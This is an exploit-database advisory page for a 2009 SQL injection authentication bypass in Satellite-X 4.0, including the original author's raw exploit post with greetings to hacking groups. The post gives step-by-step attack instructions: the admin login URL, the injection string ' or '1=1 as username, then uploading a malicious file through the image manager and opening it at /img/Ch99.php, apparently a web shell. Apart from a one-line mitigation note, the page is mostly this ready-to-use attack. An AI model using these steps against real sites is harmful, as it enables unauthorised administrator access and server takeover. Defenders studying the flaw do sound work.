Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability

vendor:

Satellite-X

by:

indoushka

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Satellite-X

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux

2009

Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability

An attacker can bypass authentication by entering ' or '1=1 as the username and 1nd0u as the password. This will allow the attacker to access the admin page and upload malicious files to the server. The attacker can then access the malicious files by going to http://127.0.0.1/satallitex/img/Ch99.php.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                              
| # Web Site :                                                                                                                                   
| # Dork     : 2009 © Satellite-X 
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : (Auth Bypass) SQL Injection                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 - http://127.0.0.1/satallitex/admin/index.php
 
 2 - username : ' or '1=1  

     password : 1nd0u
    
 3 - Go To http://127.0.0.1/satallitex/admin/index.php?config=imagesman (2 Upload Ev!l)
 
 4 - http://127.0.0.1/satallitex/img/Ch99.php (2 Find Ev!l)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------